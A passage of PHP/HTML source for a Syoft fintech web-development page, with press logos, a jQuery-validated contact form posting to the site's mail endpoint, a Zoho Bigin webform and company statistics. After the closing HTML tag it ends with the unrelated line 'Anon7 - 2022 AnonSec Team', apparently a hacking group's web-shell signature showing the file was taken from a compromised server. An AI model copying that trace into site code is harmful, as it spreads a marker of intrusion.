                        <img src="assets/img/clients/your_story.svg" alt="yourstory" class="gray img-fluid">
                        <img src="assets/img/clients/your_story.svg" alt="yourstory" class="black img-fluid">
                    </div>
                    <div class="crm-brand-item">
                        <img src="assets/img/clients/mint.svg" alt="mint" class="gray img-fluid">
                        <img src="assets/img/clients/mint.svg" alt="mint" class="black img-fluid">
                    </div>
                    <div class="crm-brand-item">
                        <img src="assets/img/clients/tet.svg" alt="the economic times" class="gray img-fluid">
                        <img src="assets/img/clients/tet.svg" alt="the economic times" class="black img-fluid">
                    </div>
                    <div class="crm-brand-item">
                        <img src="assets/img/clients/vccircle.svg" alt="vccircle" class="gray img-fluid">
                        <img src="assets/img/clients/vccircle.svg" alt="vccircle" class="black img-fluid">
                    </div>
                    <div class="crm-brand-item">
                        <img src="assets/img/clients/business_standard.svg" alt="Business Standard" class="gray img-fluid">
                        <img src="assets/img/clients/business_standard.svg" alt="Business Standard" class="black img-fluid">
                    </div>
                </div>
            </div>
        </section>
        <section class="ins-contact-section pb-60 position-relative overflow-hidden contact-form">
            <div class="container">
                <div class="row ">
                    <div class="col-xl-6 col-lg-6">
                        <div class="ins-contact-wrapper">
                            <!-- <h2 class="ml-5">Contact us to build the right product <span class="text-warning"> with the right team</span></h2> -->
                            <h2 class="">Accelerate Your Next Big Ideas with <span class="text-warning">Syoft</span></h2>
                            <!-- <div class="ins-title pe-4 mb-30 pb-2">
                                <div class="d-flex align-items-center">
                                    <span class="h5 text-warning fw-bold">Accelerate</span>
                                    <span class="ms-1">
                                        <svg width="103" height="13" viewBox="0 0 103 13" fill="none" xmlns="http://www.w3.org/2000/svg">
                                            <path d="M0.696533 6.60583L93.3054 6.60584" stroke="#dc2f00" stroke-width="1.49369" />
                                            <path d="M102.266 6.60263L93.3036 11.7769L93.3036 1.42833L102.266 6.60263Z" fill="#dc2f00" />
                                        </svg>
                                    </span>
                                </div>
                                <h2 class="ins-heading mb-0 display-5">Your Next Big Ideas with <mark>Syoft</mark> & Get Started!</h2>
                            </div> -->
                            <div class="bgn-wf-wrapper p-0" id="BiginWebToEntityFormDiv310182000000229439">
                                <!--<form id='BiginWebToContactForm310182000000229439' name='BiginWebToContactForm310182000000229439' method='POST' enctype='multipart/form-data' onSubmit='javascript:document.charset="UTF-8"; return validateForm310182000000229439()' accept-charset='UTF-8' style='margin: 0;'>-->
                                <!-- Do not remove this code. -->
                                <input type='text' style='display:none;' name='xnQsjsdp' value='423c92bf81f8e0a58493ac6d1a1b6ff0d1849ce0da73f6ebe7cb8824b708c951' />
                                <input type='text' style='display:none;' name='zc_gad' id='zc_gad' value='' />
                                <input type='text' style='display:none;' name='xmIwtLD' value='65db258607b5d5410a00f22a686f9548b88f4cdb516fe9f0f2725f95c6033ee2' />
                                <input type='text' style='display:none;' name='actionType' value='Q29udGFjdHM=' />
                                <input type='text' style='display:none;' name='returnURL' value='https://syoft.com' />
                                <!-- <div style="font-size: 1.1rem;color:#000000;font-weight:400; margin-bottom: 20px;word-break: break-word;padding-right: 15px;">Collaboratively promote client-focused convergence vis-a-vis customer directed alignments via standardized infrastructures.</div> -->
                                <div id="elementDiv310182000000229439" style="border:0;width: 100%;background-color: white;color:#000;font-family:Montserrat;text-align:left; font-size: 15;">
                                    <form action="https://www.syoft.com/thankyou.php" method="post" name="postForm" id="postForm2">
                                        <div class="bgn-wf-row">
                                            <div class="row-column">
                                                <!--<div class="bgn-wf-label">First Name-->
                                                <!--        <span class="bgn-star">&#42;</span>-->
                                                <!--</div>-->
                                                <div class="bgn-wf-field">
                                                    <input name="first_name2" id="first_name2" type="text" maxlength="40" value="" placeholder="First Name" style=" border: 1px solid #8c8c8c;padding: 10px 15px;border-radius: .375rem;width: 100%;font-family:montserrat;" />
                                                </div>
                                                <div id='first_name_Error2'></div>
                                            </div>
                                            <div class="row-column">
                                                <!--<div class="bgn-wf-label">Last name-->
                                                <!--    <span class="bgn-star">&#42;</span>-->
                                                <!--</div>-->
                                                <div class="bgn-wf-field">
                                                    <input name="last_name2" id="last_name2" type="text" maxlength="40" value="" placeholder="Last Name" style=" border: 1px solid #8c8c8c;padding: 10px 15px;border-radius: .375rem;width: 100%;font-family:montserrat;" />
                                                </div>
                                                <div id='last_name_Error2'></div>
                                            </div>
                                        </div>
                                        <div class="bgn-wf-row">
                                            <div class="row-column1">
                                                <!--<div class="bgn-wf-label">Company Name-->
                                                <!--</div>-->
                                                <div class="bgn-wf-field">
                                                    <input name="company_name2" id="company_name2" type="text" maxlength="120" value="" placeholder="Company Name" style=" border: 1px solid #8c8c8c;padding: 10px 15px;border-radius: .375rem;width: 100%;font-family:montserrat;" />
                                                </div>
                                                <div id='company_name_Error2'></div>
                                            </div>
                                        </div>
                                        <div class="bgn-wf-row">
                                            <div class="row-column">
                                                <!-- <div class="bgn-wf-label">Mobile-->
                                                <!--     <span class="bgn-star">&#42;</span>-->
                                                <!--</div>-->
                                                <div class="bgn-wf-field">
                                                    <input name="mobile2" id="mobile2" type="text" maxlength="30" value="" placeholder="Mobile" style=" border: 1px solid #8c8c8c;padding: 10px 15px;border-radius: .375rem;width: 100%;font-family:montserrat;" />
                                                </div>
                                                <div id='mobile_Error2'></div>
                                            </div>
                                            <div class="row-column">
                                                <!-- <div class="bgn-wf-label">Email-->
                                                <!--     <span class="bgn-star">&#42;</span>-->
                                                <!--</div>-->
                                                <div class="bgn-wf-field">
                                                    <input name="email2" id="email2" type="text" maxlength="100" value="" placeholder="Email" style=" border: 1px solid #8c8c8c;padding: 10px 15px;border-radius: .375rem;width: 100%;font-family:montserrat;" />
                                                </div>
                                                <div id='email_Error2'></div>
                                            </div>
                                        </div>
                                        <div class="bgn-wf-row">
                                            <div class="row-column1">
                                                <!--<div class="bgn-wf-label">Message-->
                                                <!--</div>-->
                                                <div class="bgn-wf-field">
                                                    <textarea name="description2" id="description2" maxlength="32000" placeholder="Message" style=" border: 1px solid #8c8c8c;padding: 10px 15px;border-radius: .375rem;width: 100%;font-family:montserrat;"></textarea>
                                                </div>
                                                <div id='description_Error2'></div>
                                            </div>
                                        </div>
                                        <div class="bgn-wf-row">
                                            <div class="row-column1">
                                                <!-- <label for="formFileLg">
                                                    <img src="assets/img/attach-file.svg" class=" " id="formFileLg">
                                                    <span>Attach file&nbsp;<i class="item-file"></i></span>
                                                </label> -->
                                                <input type="file" id="photo" name="photo" accept="image/*">
                                                <div id='description_Error2'></div>
                                            </div>
                                        </div>
                                        <div class="bgn-wf-row">
                                            <div class="row-column1">
                                                <small>By sending a message you agree with your information being stored by us in relation to dealing with your enquiry. Please have a look at our <a href="privacy-policy.php" target="_blank"> Privacy Policy.</a></small>
                                                <div class="form-check d-flex mt-3">
                                                    <input class="form-check-input me-2" type="checkbox" value="" id="flexCheckChecked">
                                                    <label class="form-check-label" for="flexCheckChecked">
                                                        I’d like to sign an NDA with Syoft Software</a>
                                                    </label>
                                                </div>
                                                <div id='description_Error2'></div>
                                            </div>
                                        </div>
                                        <div class="bgn-wf-row" style="margin-top: 5px;">
                                            <!--<div class="bgn-wf-label"></div>-->
                                            <!-- <div class="action-btns text-left pt-2 aos-init aos-animate" type='submit' data-aos="fade-up" data-aos-delay="100">
                                                <a href="#" class="btn btn-warning me-lg-4 me-sm-4" id='formsubmit310182000000229439'><i class="far fa-arrow-right"></i> Submit contact form</a>
                                                <a href="#" class="btn btn-primary "><i class="far fa-arrow-right"></i> info@syoft.com</a>
                                            </div> -->
                                            <div class="bgn-wf-field text-left pt-2 aos-init aos-animate" data-aos="fade-up" data-aos-delay="100">
                                                <button class="btn btn-warning me-lg-4 me-sm-4" id='formsubmit310182000000229439' type='submit'><i class="far fa-arrow-right"></i> Submit contact form</button>
                                                <a href="mailto:info@syoft.com" class="btn btn-primary"><i class="far fa-arrow-right pe-1"></i>info@syoft.com</a>
                                            </div>
                                        </div>
                                    </form>
                                </div>
                                <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
                                <script>
                                    // for sending email code start
                                    // second form
                                    $("#formsubmit310182000000229439").on("click", function(e) {
                                        var regx = /^[6-9]\d{9}$/;
                                        var validRegex = /^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$/;
                                        var first_name_Error2 = last_name_Error2 = company_name_Error2 = email_Error2 = mobile_Error2 = description_Error2 = true;
                                        if ($("#first_name2").val().length === 0) {
                                            e.preventDefault();
                                            $("#first_name_Error2").html("First name is required.").addClass("error-msg");
                                            first_name_Error2 = false
                                        } else {
                                            $("#first_name_Error2").html("").removeClass("error-msg");
                                        }
                                        if ($("#last_name2").val().length === 0) {
                                            e.preventDefault();
                                            $("#last_name_Error2").html("Last name is required.").addClass("error-msg");
                                            last_name_Error2 = false
                                        } else {
                                            $("#last_name_Error2").html("").removeClass("error-msg");
                                        }
                                        if ($("#company_name2").val().length === 0) {
                                            e.preventDefault();
                                            $("#company_name_Error2").html("Company is required.").addClass("error-msg");
                                            company_name_Error2 = false
                                        } else {
                                            $("#company_name_Error2").html("").removeClass("error-msg");
                                        }
                                        if (regx.test($("#mobile2").val()) == false || $("#mobile2").val().length === 0) {
                                            e.preventDefault();
                                            $("#mobile_Error2").html("Mobile is required.").addClass("error-msg");
                                            mobile_Error2 = false
                                        } else {
                                            $("#mobile_Error2").html("").removeClass("error-msg");
                                        }
                                        if (validRegex.test($("#email2").val()) == false || $("#email2").val().length === 0) {
                                            e.preventDefault();
                                            $("#email_Error2").html("Email is required.").addClass("error-msg");
                                            email_Error2 = false
                                        } else {
                                            $("#email_Error2").html("").removeClass("error-msg");
                                        }
                                        if ($("#description2").val().length === 0) {
                                            e.preventDefault();
                                            $("#description_Error2").html("Description is required.").addClass("error-msg");
                                            description_Error2 = false
                                        } else {
                                            $("#description_Error2").html("").removeClass("error-msg");
                                        }
                                        //  e.preventDefault();
                                        var postForm = {
                                            'first_name': $('input[name=first_name2]').val(),
                                            'last_name': $('input[name=last_name2]').val(),
                                            'company_name': $('input[name=company_name2]').val(),
                                            'mobile': $('input[name=mobile2]').val(),
                                            'email': $('input[name=email2]').val(),
                                            'description': $('#description2').val(),
                                            'subject': "Finteh Web Development",
                                        };
                                        if (first_name_Error2 == true && last_name_Error2 == true && description_Error2 == true && email_Error2 == true && mobile_Error2 == true && company_name_Error2 == true) {
                                            $.ajax({
                                                type: 'POST',
                                                url: 'https://syoft.com/blogs/welcome/sendemail',
                                                data: postForm,
                                                dataType: 'json',
                                                cors: true,
                                                success: function(data) {
                                                    // alert('data')
                                                }
                                            });
                                            // window.location.href = window.location.href
                                            document.getElementById("postForm2").reset();
                                            window.location = window.location.origin + '/thankyou.php'
                                        }
                                    });
                                    // second form
                                    // for sending email code end
                                    function disableSubmitwhileReset310182000000229439() {
                                        var submitbutton = document.getElementById('formsubmit310182000000229439');
                                        if (document.getElementById('privacyTool310182000000229439') !== null || document.getElementById('consentTool') !== null) {
                                            submitbutton.disabled = true;
                                            submitbutton.style.opacity = '0.5;';
                                        } else {
                                            submitbutton.removeAttribute('disabled');
                                        }
                                    }

                                    function checkMandatory310182000000229439() {
                                        var mndFields = new Array('First Name', 'Last Name', 'Email', 'Mobile');
                                        var fldLangVal = new Array('First Name', 'Last Name', 'Email', 'Mobile');
                                        var i;
                                        var mndFieldslength = mndFields.length;
                                        var fieldObj;
                                        for (i = 0; i < mndFieldslength; i++) {
                                            fieldObj = document.forms.BiginWebToContactForm310182000000229439[mndFields[i]];
                                            if (fieldObj) {
                                                if (fieldObj.value.replace(/^s+|s+$/g, '').length === 0) {
                                                    if (fieldObj.type === 'file') {
                                                        alert('Please select a file to upload.');
                                                        fieldObj.focus();
                                                        return false;
                                                    }
                                                    alert(fldLangVal[i] + ' cannot be empty.');
                                                    fieldObj.focus();
                                                    return false;
                                                } else if (fieldObj.nodeName === 'SELECT') {
                                                    if (fieldObj.options[fieldObj.selectedIndex].value === '-None-') {
                                                        alert(fldLangVal[i] + ' cannot be none.');
                                                        fieldObj.focus();
                                                        return false;
                                                    }
                                                } else if (fieldObj.type === 'checkbox') {
                                                    if (fieldObj.checked === false) {
                                                        alert('Please accept  ' + fldLangVal[i]);
                                                        fieldObj.focus();
                                                        return false;
                                                    }
                                                }
                                                if (fieldObj.name === 'Last Name' && fieldObj.value) {
                                                    name = fieldObj.value;
                                                }
                                            }
                                        }
                                        return true;
                                    }

                                    function validateFileUpload() {
                                        var e = document.getElementById("theFile"),
                                            t = 0;
                                        if (e) {
                                            if (e.files.length > 3) return alert("You can upload a maximum of three files at a time."), !1;
                                            if ("files" in e) {
                                                var i = e.files.length;
                                                if (0 !== i) {
                                                    for (var o = 0; o < i; o++) {
                                                        var a = e.files[o];
                                                        "size" in a && (t += a.size)
                                                    }
                                                    if (t > 20971520) return alert("Total file(s) size should not exceed 20MB."), !1
                                                }
                                            }
                                        }
                                        return !0
                                    }
                                </script>
                                <script id='wf_script' src='https://bigin.zoho.in/crm/WebformScriptServlet?rid=65db258607b5d5410a00f22a686f9548b88f4cdb516fe9f0f2725f95c6033ee2gid423c92bf81f8e0a58493ac6d1a1b6ff0d1849ce0da73f6ebe7cb8824b708c951'></script>
                                <!--</form>-->
                            </div>
                        </div>
                    </div>
                    <div class="col-xl-5 col-lg-5 offset-lg-1">
                        <div class="section-heading aos-init aos-animate mb-0" data-aos="fade-up">
                            <h3>Top-rated software<br /> development company</h3>
                            <ul class="list-unstyled d-flex flex-wrap list-two-col mt-2 mb-5">
                                <li class="py-3 stack_list">
                                    <h3 class="display-5 fw-bold mb-2 text-warning">200+</h3>
                                    <p>projects delivered <br /> remotely</p>
                                </li>
                                <li class="py-3 stack_list_1">
                                    <h3 class="display-5 fw-bold mb-2 text-warning">92%</h3>
                                    <p>of a team senior & <br /> middle engineers </p>
                                </li>
                                <li class="py-3 stack_list_2">
                                    <h3 class="display-5 fw-bold mb-2 text-warning">20%</h3>
                                    <p>employee turnover <br /> rate</p>
                                </li>
                                <li class="py-3 stack_list_3">
                                    <h3 class="display-5 fw-bold mb-2 text-warning">9/10</h3>
                                    <p>customer satisfaction <br /> score</p>
                                </li>
                            </ul>
                            <ul class="customer-logos-grid text-center list-unstyled mb-0">
                                <li>
                                    <img src="assets/img/clients/rev1.svg" width="200" alt="clients logo" class="img-fluid p-1 m-auto aos-init aos-animate" data-aos="fade-up">
                                </li>
                                <li>
                                    <img src="assets/img/clients/rev2-foot.svg" width="200" alt="clients logo" class="img-fluid p-1 m-auto aos-init aos-animate" data-aos="fade-up" data-aos-delay="50">
                                </li>
                                <li>
                                    <img src="assets/img/clients/rev3-foot.svg" width="200" alt="clients logo" class="img-fluid p-1 m-auto aos-init aos-animate" data-aos="fade-up" data-aos-delay="100">
                                </li>
                                <li>
                                    <img src="assets/img/clients/gartner_peer_insights.png" width="200" alt="clients logo" class="img-fluid p-1 m-auto aos-init aos-animate" data-aos="fade-up" data-aos-delay="150">
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <section class="crm-cta-section ptb-80 crm-bg-yellow-light position-relative z-1">
            <img src="assets/img/shape/circle-half.png" alt="circle half" class="position-absolute circle-half z--1">
            <img src="assets/img/shape/dot-red.png" alt="doted" class="position-absolute doted z--1 d-none d-md-block">
            <div class="container">
                <div class="row justify-content-center">
                    <div class="col-xl-7">
                        <div class="crm-title text-center">
                            <span class="crm-subtitle">Connect With Our Experts <img src="assets/img/shape/arro-right.svg" alt="arrow" class="ms-1"></span>
                            <h2 class="mt-2 mb-3">For Your Fintech Web Development Consultation</h2>
                            <a href="contact-us.php" class="btn btn-warning mt-4">Get Proposal</a>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <!--footer section start-->
        <?php include 'footer.php'; ?>
        <!--footer section end-->
    </div>
    <!--build:js-->
    <script src="assets/js/vendors/jquery-3.6.0.min.js"></script>
    <script src="assets/js/vendors/bootstrap.bundle.min.js"></script>
    <script src="assets/js/vendors/swiper-bundle.min.js"></script>
    <script src="assets/js/vendors/jquery.magnific-popup.min.js"></script>
    <script src="assets/js/vendors/parallax.min.js"></script>
    <script src="assets/js/vendors/aos.js"></script>
    <script src="assets/js/app.js"></script>
    <!--endbuild-->
</body>

</html>

Anon7 - 2022
AnonSec Team